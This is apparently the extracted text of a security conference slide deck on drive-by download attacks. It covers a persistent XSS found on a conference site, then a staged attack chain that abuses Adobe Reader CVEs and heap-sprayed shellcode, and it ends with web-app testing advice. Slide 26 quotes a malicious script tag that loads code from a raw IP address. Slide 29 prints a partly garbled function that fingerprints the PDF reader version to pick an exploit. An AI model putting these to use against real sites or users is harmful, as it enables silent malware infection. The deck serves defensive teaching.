Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
1. Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Lars Ewe, Cenzic Neil Daswani, Dasient Session ID: xxx-xxxx Session Classification: xxxxxxxxxxxx
2. Drive-By via XSS on RSA Conf Website Discovered by Gerry Eisenhaur (Dasient) Persistent XSS in Jive “Benign” drive-by injected / Pops up calc.exe Script element embedded in a “tag” at:https://365.rsaconference.com/people/gerrye?view=bookmarks Un-escaped tag (and benign drive-by) rendered athttps://365.rsaconference.com/view-profile-favorites-list.jspa?targetUser=18102 Yet again -- use of SSL alone does not provide security – code must be made secure also!
26. Step 1: Inject Really Malicious JavaScript Sources in malicious JavaScript from a compromised IP! Infects user's machine silently <script id=_0_ src=//218.93.202.61/cp/></script>
27. Step 2: Invoke Client-Side Vulnerability CVE-2008-2992Description: Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104 CVE-2007-5659Description: Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. CVE-2009-0927Description: Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object.
28. Step 2: Ex. Fingerprint PDF Reader JavaScript generates a zero-size IFRAME in web page sources in a PDF file PDF file has JavaScript that fingerprints the version of the PDF reader (Note: JavaScript interpreter used by PDF reader is different than JavaScript interpreter used by browser) Attacker needs to determine which version of the PDF reader / JavaScript interpreter to target
29. Step 2: Ex. Fingerprint PDF Reader function pdf_start(){var version=app.viewerVersion.toString();version=version.replace(//g,'');varversion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));if((version_array[0]==8)&&(version_array[1]==0)||(version_array[1]==1&&version_array[2]DA3)){util_printf();} if((version_array[0]DA8)||(version_array[0]==8&&version_array[1]DA2&&version_array[2]DA2)){collab_email();} if((version_array[0]DA9)||(version_array[0]==9&&version_array[1]DA1)){collab_geticon();}} pdf_start();}
30. Step 3: Deliver Shellcode Depending upon version of Adobe PDF Reader / JavaScript interpreter, send appropriate shellcode “Spray” the heap with assembly instructions that give shell access Call a PDF reader helper function that jumps to shellcode on the heap (e.g., collab_email())
45. Manage Website Risk: Fast & Easy TestAllApps For HealthCheck Low R I S K S C O R E Strong Testing for Important Apps Robust Testing for Critical Apps High
46. Takeaways: What You Should Do Within 3 Months Test ALL your web applications via a HealthCheck Test for both application vulnerabilities and malware Prioritize your vulnerabilities based on risk score Block until you remediate Get Feb 2011 Ponemon research report on the state of web application security
52. 34 Thank You! Lars Ewe, Cenzic Neil Daswani, Dasient
Notas del editor
Use web application vulnerability (stored XSS) to inject legitimate web page with malicious code (e.g., JavaScript, IFRAME, etc)Invoke client-side vulnerability (e.g., IE zero-day, PDF exploit, etc) OR use social engineeringDeliver shellcode to take controlSend “downloader”Deliver malware of attackers choice